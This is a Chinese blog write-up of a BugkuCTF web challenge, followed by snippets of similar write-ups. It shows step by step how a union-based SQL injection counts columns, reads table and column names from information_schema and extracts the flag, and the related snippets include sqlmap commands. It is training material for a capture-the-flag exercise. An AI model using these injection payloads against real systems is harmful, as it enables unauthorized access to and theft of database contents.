【BugkuCTF Web】成绩单

最新推荐文章于 2022-03-14 22:04:40 发布

原创最新推荐文章于 2022-03-14 22:04:40 发布 · 384 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#mysql #安全

本文详细介绍了如何通过SQL注入攻击获取数据库信息的过程。首先，通过测试确定了查询系统回显字段的个数为4个，然后逐步获取了数据库的表名、字段名及具体的flag值。这一过程展示了SQL注入的基本原理和技术细节。

题目描述：

进入题目页面：

随便输入一点东西看看，输入1：

输入2：

初步判断这是一个查询系统，应该和SQL注入有关。

先看看回显字段个数，假设有4个回显字段，在查询框中输入语句：

1' order by 4#

正常回显：

将4改成5，再试试：

1' order by 5#

回显消失了，说明回显字段的个数是4个。

下面获取回显位置，构造语句：

-1' union select 1, 2, 3, 4#

从图中我们可以得知，表格中回显的位置是2，3，4。

选取一个位置，这里以第2个位置为例，开始获取数据库信息。

构造语句，获取表名：

-1' union select 1, group_concat(table_name), 3, 4 from information_schema.tables where table_schema=database()#

得到表名：fl4g、sc。

构造语句，查询fl4g表中的字段名：

-1' union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name='fl4g'#

得到字段名：skctf_flag。

构造语句，查询该表中skctf_flag字段的值：

-1' union select 1, skctf_flag, 3, 4 from fl4g#

得到flag：BUGKU{Sql_INJECT0N_4813drd8hz4}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

_Kisaragi_

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BugkuCTF-web-成绩单 writeup

kuller_Yan的博客

03-26

526

记一次简单的SQL注入题目传送门，点击即走首先分析题目：进入题目网页就可以看到这个遇到表单，当然要填一填，看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1，并且返回后，出现了龙龙龙的成绩单以及四份数据。于是打开hackbar，post提交正常返回，加 ’ 测试一下啥也不是，再加个 # 又正常了。那么基本可以认定是SQL注入无疑了。两种解题方法： 1：手...

SQL注入最最最基础（bugku成绩单）

qq_51439282的博客

12-07

1658

SQL注入今天在b站看了sql注入基础的视频（up主：小学生Tony君的第1天–sql注入，如何一步一步获取数据），醍醐灌顶，来此记录一下心得体会。这里我们会拿BUGKU的成绩单这一题作为例题来讲解。题目链接：http://123.206.87.240:8002/chengjidan/ SQL注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中，再在后台 Sql 服务器上解析执行进行的攻击，它目前黑客对数据库进行攻击的最常用手段之一。 SQL注入原理这里拿构造id=1

参与评论您还未登录，请先登录后发表或查看评论

Bugku-web之成绩查询

weixin_42939822的博客

03-14

3640

今天是一道地地道道的sql注入题目，通过手动注入不仅可以加深对于sql语句的应用，也能够通过实战了解sql语句的运作，更好地体会到sql注入漏洞存在的潜在危害！！！ctf小白之旅继续前行！！！

bugku成绩单

qq_51283187的博客

08-13

247

bugku成绩单 今天重温经典做了一遍这个题哎,SQL注入好多细节都忘了该补补课了。 1 sql注入的时候order by 一定要看好10000000是不是也可以刚刚做题的时候1" order by 10000000000# 这样都行，就很离谱，起不到想知道有多少列的效果了 2 这个时候我们再换用 1’ order by 4 # ok 1’ order by 5 # error 这样就知道只有’在这里才生效 3 对了还要注意前一个为-1，留出位置。好久不复习了，都要忘了 4 并且还要注意噢， -1 un

bugku 成绩单

weixin_46578840的博客

07-24

132

打开网站抓包，直接开整 -1’ union select 1,2,3,4 – //四列 -1’ union select 1,2,3,database() – //得出数据库 -1’ union select 1,2,3,(select group_concat(table_name) from information_schema.tables wheretable_schema=‘skctf’) – //得出表 id=-94’ union select 1,2,3,(select group_conca

BugkuCTF： 成绩单（web）

s0il的博客

04-02

910

题目描述：让人看上去就是SQL注入。提交一下，出现三列属性，flag就应该在这里面：手动注入：在表单中输入1或者1#或者1--或者1++等返回正常，输入1'返回异常库名、表名、字段名的获取：联合查询 id=-1' union select 1,2,3,4# 之后返回：或者执行-1' orde...

BugkuCTF练习题解——Web一

qq_41739275的博客

08-24

7294

文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸，好家伙，吓我一跳，还以为是大bug，然后也没有提示啥的感觉有点无从下手？？？别急，打开页面源代码（检查元素也可）瞅瞅注释部分就是flag了。 2.

CTF|BugkuCTF-WEB解题思路

这里是一处长期不更新的博客

06-15

2325

截止至练习题【login4】，仅提供解题思路。 WEB2 按F12直接可得flag 计算器：直接按F12，将maxlength修改，输入正确结果即可得到flag web基础$_GET URL输入：http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具，按F12，打开Post data，传递what=flag。矛盾这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.

BugkuCTF——最新web篇writeup（持续更新）

1匹黑马

11-16

4486

文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag：KEY{Web-2-bugKssNNikls9100} 计算器这里做了输入长度限制，F12选中输入框，修改长度限制即可。 flag：flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET，只要我们传递的参数为what，并且内容为flag，即可输出flag。 flag：flag{bugku_get_su8

BugKu——成绩单

D-R0s1的博客

10-08

983

sql注入在CTF类竞赛中占着很大的比重，在做BugKu的题目的过程中恰好遇到了一个没有任何过滤，直接注入的题目，因为没有过滤，只是单纯的考察sql注入，所以步骤比较固定，语句也比较简单 1.首先，爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1，2，3都有回显，然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...

BugKu之成绩单

Tle_Camouflage的博客

08-23

1549

成绩单(Web) 输入1并进行抓包。然后按右键，点击copy to file保存文件，这里我保存到了C盘 333.txt。然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db -r –> 加载一个文件 -p –>指定参数 –current-db –>获取当前数据库名称（current前有...

bugku---成绩单

LuckySec

11-16

583

题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...

成绩单 （bugku--web）

小白的劝退之路

04-29

513

解法一：手工注入输入1，2，3分别能查到1，2，3号学生的成绩 SQL注入应该没跑了输入1’返回异常，输入1’–+返回异常，输入1’ #或者1’-- +返回正常，看来过滤了–+ 观察，表貌似有四列（名字，Math，English，Chinese），输入1’ order by 4#返回正常，输入1’ order by 5#返回异常，看来的确是4列接下来就开始暴库名、表名、字段名尝试联合查询，...

BugkuCTF之web题之成绩单

A_dmin的博客

12-07

6332

BugkuCTF之web题之成绩单 1.向其中分别输入1,2,3…发现可以查询，当向其中输入1’时，程序不能查询，根据观察题目，猜测应该可以大概判断出有四个字段 2.在成绩查询处开始爆数据库名，输入0’ union select database(),2,3,4 # 得到：说明数据库的名为skctf_flag 3.在成绩查询处开始爆数据库表名，输入0’ union select table_...

bugku 成绩单 总结

DreamHigh

08-28

3074

试题地址： http://40.125.170.89:49164/index.php 成绩查询龙龙龙的成绩单 Math English Chinese 60 60 70 方法一：常规方法进入这道题目我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显于是就开始爆破吧通过id=-1...

bugku 成绩单详解

qq_35811830的博客

01-26

1364

bugku 成绩单详解首先打开查询成绩的页面在火狐浏览器下使用hackbar插件对页面进行post请求，分别依次输入id=1,2,3,4 当你这样去试了之后，就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩，但是当id=4的时候，成绩单里面的成绩又为空了。因此我们可以猜测数据库里面一共是有四列的然后在此处利用内置函数database()爆破获取数据库的名字。至于为什么使用u...

bugku 成绩查询

m0_51504576的博客

04-21

680

最近刚好在了解sql注入的一些知识，然后刚好刷到了这题，记录一下我的思路吧~ 看到题目页面一个输入框就觉得是和sql注入有关的题目了，首先查看网页源代码：看到name=id，在火狐浏览器用maxhackerbar打开传递参数试试：成功查到了成绩单，并且切换1,2,3都可以成功，再判断是字符型注入还是数值型注入： id=1成功查询，id=1’查询失败，id=1’#查询成功，所以该注入类型为字符型注入。简单说明一下为什么：如果是数值型注入：where id =1 成功 where id=1’失败 w

Bugku--学生成绩查询

Golderant的博客

01-17

3129

首先测试正常数据。尝试在正常数据后加上单引号，发现数据为空，加个注释符发现依旧可以正常输出。尝试获取列数，因为已经输出名字和3科分数，所以就猜4和5，得知查询结果中有4列。尝试直接联合查询，这里要记得把前面查询为空。== 根据数据库去查表名找到fl4g表，下一步，找列名最后一步，知道表名知道列名啦，去获取数据吧~~ 关于这个题呢，因为表fl

Bugku：成绩单

Newbiek的博客

04-02

1001

首先，正常输入测试： Burp发现其为post包，只有1到3可以进行查询：加单引号测试发现，这是一个注入点：猜测注入的类型，发现and 1=1没有变化，但是1=2也没有变化：不是数字型注入就试试字符型注入：下一步就到了测试页面回显的地方的时候了，因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列（可能还有隐藏的东西）：确认了回显...

Bugku CTF WEB解题技巧分享与讨论

标题和描述中提到的知识点主要涉及CTF（Capture The Flag，夺旗赛）中的WEB类型题目，以及解题思路和writeup的编写和分享。下面详细说明这些知识点： 1. CTF概念解析 CTF是一种信息安全竞赛，通常分为多种类型，...